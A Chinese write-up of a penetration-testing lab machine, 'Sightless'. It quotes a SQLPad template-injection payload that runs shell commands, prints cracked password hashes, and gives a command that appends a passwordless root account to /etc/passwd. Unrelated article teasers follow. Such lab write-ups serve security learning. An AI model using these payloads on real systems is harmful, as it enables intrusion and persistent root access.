記一次滲透測試實戰之Sightless

信息收集

端口掃描

使用nmap進行端口探測,發現存在21、22、80端口開放。

FTP未授權訪問

嘗試21端口未授權訪問。

目錄爆破

使用工具進行爆破目錄。

未發現有用的路徑,接著嘗試訪問80端口。

Web網站

訪問主頁

發現存在一個數據庫調用頁面

右上角有一個與連接交互的菜單:

Google搜索

使用google搜索cve漏洞。

漏洞利用

CVE-2022-0944

漏洞簡介

Description
Please enter a description of the vulnerability.Proof of Concept
Run a local docker instance
sudo docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:latest
Navigate to http://localhost:3000/
Click on Connections->Add connection
Choose MySQL as the driver
Input the following payload into the Database form field
{{ process.mainModule.require('child_process').exec('id>/tmp/pwn') }}
Execute the following command to confirm the /tmp/pwn file was created in the container filesystem
sudo docker exec -it sqlpad cat /tmp/pwn
Impact
An SQLPad web application user with admin rights is able to run arbitrary commands in the underlying server.

遠程代碼執行

使用nc監聽。

接著使用poc進行攻擊,即可獲取webshell。

內網滲透

Docker

發現運行在一個docker容器里面。

發現有兩個用戶的主目錄位于/home

恢復密碼

將查到的密碼保存之后,進行恢復。

root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b. michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/

接著進行hash爆破,成功獲取用戶密碼。

SSH登錄

接著使用該密碼進行登錄ssh。

登錄之后,獲取user.txt.

發現michael 用戶無法運行sudo

尋找默認文件

查看默認配置

發現存在8000端口。

隧道搭建

接著使用ssh進行端口轉發。

然后訪問8000端口。

發現一個登錄頁面。

抓包嘗試。

Chrome 調試

查找調試端口

chrome進程中,它使用 將調試端口設置為 0。--remote-debugging-port=0這意味著每次啟動時它都會是一個隨機的高端口。我將檢查netstat

獲取密碼

單擊第一行的“檢查”將啟動一個窗口,顯示開發工具中的活動。

CVE-2024-34070

漏洞簡介:

Froxlor 是一款開源服務器管理軟件。在 2.1.9 之前,Froxlor 應用程序的失敗登錄嘗試日志記錄功能中發現了一個存儲盲跨站點腳本 (XSS) 漏洞。未經身份驗證的用戶可以在登錄嘗試時在 loginname 參數中注入惡意腳本,然后當管理員在系統日志中查看時,該腳本將被執行。通過利用此漏洞,攻擊者可以執行各種惡意操作,例如在管理員不知情或未經同意的情況下強迫管理員執行操作。例如,攻擊者可以強迫管理員添加由攻擊者控制的新管理員,從而使攻擊者完全控制應用程序。此漏洞已在 2.1.9 中修復。

發現是PHP8.1.2

權限提升

PHP FPM遠程代碼執行

發現有一處功能點可執行命令

寫入反彈shell腳本。

echo "echo '0dayhp::0:0:0test1:/root:/bin/bash' >> /etc/passwd">test.sh

然后保存之后,運行。

獲取root權限

成功獲取root權限

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/70306.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/70306.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/70306.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

前端監控的具體實現細節

🤍 前端開發工程師、技術日更博主、已過CET6 🍨 阿珊和她的貓_CSDN博客專家、23年度博客之星前端領域TOP1 🕠 牛客高級專題作者、打造專欄《前端面試必備》 、《2024面試高頻手撕題》 🍚 藍橋云課簽約作者、上架課程《Vue.js 和 E…

【網絡安全 | 漏洞挖掘】我如何通過Cookie Manipulation發現主域上的關鍵PII?

未經許可,不得轉載。 文章目錄 正文正文 在分析 Example.com 的認證機制時,我注意到一個特定的 cookie,USER_ID,包含了一個具有預測性的會話標識符,其格式為: USER_ID="VYCVCDs-TZBI:XXXX-random-data"其中,XXXX 是由四個大寫字母組成的部分,我使用 Burp S…

PostgreSQL 的崛起與無服務器數據庫的新時代

根據 2023 年 Stack Overflow 開發人員調查 ,PostgreSQL 超越 MySQL 成為最受開發人員推崇和期望的數據庫系統,這是一個重要的里程碑。這一轉變反映了開發人員社區對 PostgreSQL 強大的功能集、可靠性和可擴展性的日益認同。 這種不斷變化的格局激發了數…

計算機視覺+Numpy和OpenCV入門

Day 1:Python基礎Numpy和OpenCV入門 Python基礎 變量與數據類型、函數與類的定義、列表與字典操作文件讀寫操作(讀寫圖像和數據文件) 練習任務:寫一個Python腳本,讀取一個圖像并保存灰度圖像。 import cv2 img cv2.im…

cesium基礎設置

cesium官網下載&#xff1a;https://cesium.com/downloads/ 1.安裝cesium 選擇下載到本地使用&#xff0c;或者通過npm下載到項目中 2.代碼書寫 &#xff08;1&#xff09;創建容器 <div id"cesiumContainer" style"width: 100%; height: 100%"><…

C++ 實踐擴展(Qt Creator 聯動 Visual Studio 2022)

? 這里我們將在 VS 上實現 QT 編程&#xff0c;實現如下&#xff1a; 一、Vs 2022 配置&#xff08;若已安裝&#xff0c;可直接跳過&#xff09; 點擊鏈接&#xff1a;?????Visual Studio 2022 我們先去 Vs 官網下載&#xff0c;如下&#xff1a; 等待程序安裝完成之…

《解鎖自然語言處理:讓公眾正確擁抱AI語言魔法》

在當今數字化浪潮中&#xff0c;自然語言處理&#xff08;NLP&#xff09;技術作為人工智能領域的璀璨明珠&#xff0c;正以驚人的速度融入我們的生活。從智能語音助手到智能客服&#xff0c;從機器翻譯到內容創作輔助&#xff0c;NLP技術無處不在。然而&#xff0c;如同任何強…

uniapp webview嵌入外部h5網頁后的消息通知

最近開發了個oa系統&#xff0c;pc端的表單使用form-create開發&#xff0c;form-create 是一個可以通過 JSON 生成具有動態渲染、數據收集、驗證和提交功能的表單生成組件。移動端使用uniapp開發&#xff0c;但是因為form-create移動端只支持vant&#xff0c;不支持uniapp。官…

Python在網絡安全中的應用 python與網絡安全

前言 網絡安全是保護網絡、系統和程序免受數字攻擊的做法。據估計&#xff0c; 2019 年該行業價值 1120 億美元&#xff0c;到2021 年估計有 350 萬個職位空缺。 許多編程語言用于執行與網絡安全相關的日常任務&#xff0c;但其中一種已成為行業標準&#xff1a;Python&#…

設計模式15:中介者模式

系列總鏈接&#xff1a;《大話設計模式》學習記錄_net 大話設計-CSDN博客 1.概述 中介者模式&#xff08;Mediator Pattern&#xff09;是一種行為設計模式&#xff0c;旨在通過一個中介對象來封裝一系列對象之間的交互方式&#xff0c;從而減少這些對象間的直接依賴。在該模式…

golang常用庫之-swaggo/swag根據注釋生成接口文檔

golang常用庫之-swaggo/swag庫根據注釋生成接口文檔 什么是swaggo/swag github&#xff1a;https://github.com/swaggo/swag 參考文檔&#xff1a;https://golang.halfiisland.com/community/pkgs/web/swag.html#%E4%BD%BF%E7%94%A8 swaggo/swag 是 Swagger API 2.0 在 go 語…

爬取網站內容轉為markdown 和 html(通常模式)

我們遇到一些自己喜歡內容&#xff0c;想保存下來&#xff0c;手動復制粘貼很麻煩&#xff0c;我們使用 python 來爬取這些內容。 一、代碼 downlod.py import os import requests from bs4 import BeautifulSoup from urllib.parse import urljoin# 目標網頁&#xff08;可…

. Spring MVC

&#xff08;1&#xff09;MVC 設計模式 Model&#xff08;模型&#xff09;&#xff1a;負責存儲數據和業務邏輯。在 Spring MVC 中&#xff0c;模型通常是 JavaBean&#xff0c;用于封裝數據。 View&#xff08;視圖&#xff09;&#xff1a;負責展示數據給用戶。可以是 JSP…

高效執行自動化用例:分布式執行工具pytest-xdist實戰!

01、聲明 在介紹pytest-xdist時&#xff0c;不講任何原理&#xff0c;需要看原理的請移至官方&#xff1a;https://pypi.org/project/pytest-xdist/ 當我們自動化測試用例非常多的時候&#xff0c; 一條條按順序執行會非常慢&#xff0c;pytest-xdist的出現就是為了讓自動化測…

【ISO 14229-1:2023 UDS診斷全量測試用例清單系列:第十八節】

ISO 14229-1:2023 UDS診斷服務測試用例全解析&#xff08;ResponseOnEvent_0x86服務&#xff09; 作者&#xff1a;車端域控測試工程師 更新日期&#xff1a;2025年02月14日 關鍵詞&#xff1a;UDS協議、0x86服務、事件響應、ISO 14229-1:2023、ECU測試 一、服務功能概述 0x86…

deepseek多列數據對比,聯想到excel的高級篩選功能

目錄 1 業務背景 ?2 deepseek提示詞輸入 ?3 聯想分析 4 EXCEL高級搜索 1 業務背景 系統上線的時候經常會遇到一個問題&#xff0c;系統導入的數據和線下的EXCEL數據是否一致&#xff0c;如果不一致&#xff0c;如何快速找到差異值&#xff0c;原來腦海第一反應就是使用公…

TailwindCss的vue3安裝使用

按照官網的安裝教程&#xff0c;屬性最后無法生效&#xff0c;這是自我改良版&#xff0c;添加了額外步驟&#xff0c;但是每次引入新的tailwindcss屬性 需要重新跑一次項目 npm下載tailwindcss npm install -D tailwindcss npx初始化tailwind配置 npx tailwindcss init 此時根…

個人博客測試報告

一、項目背景 個人博客系統采用前后端分離的方法來實現&#xff0c;同時使用了數據庫來存儲相關的數據&#xff0c;同時將其部署到云服務器上。前端主要有四個頁面構成&#xff1a;登錄頁、列表頁、詳情頁以及編輯頁&#xff0c;以上模擬實現了最簡單的個人博客系統。其結合后…

Python----數據結構(單鏈表:節點,是否為空,長度,遍歷,添加,刪除,查找)

一、鏈表 鏈表是一種線性數據結構&#xff0c;由一系列按特定順序排列的節點組成&#xff0c;這些節點通過指針相互連接。每個節點包含兩部分&#xff1a;元素和指向下一個節點的指針。其中&#xff0c;最簡單的形式是單向鏈表&#xff0c;每個節點含有一個信息域和一個指針域&…

夜鶯監控發布 v8.beta5 版本,優化 UI,新增接口認證方式便于鑒權

以防讀者不了解夜鶯&#xff0c;開頭先做個介紹&#xff1a; 夜鶯監控&#xff0c;英文名字 Nightingale&#xff0c;是一款側重告警的監控類開源項目。類似 Grafana 的數據源集成方式&#xff0c;夜鶯也是對接多種既有的數據源&#xff0c;不過 Grafana 側重在可視化&#xff…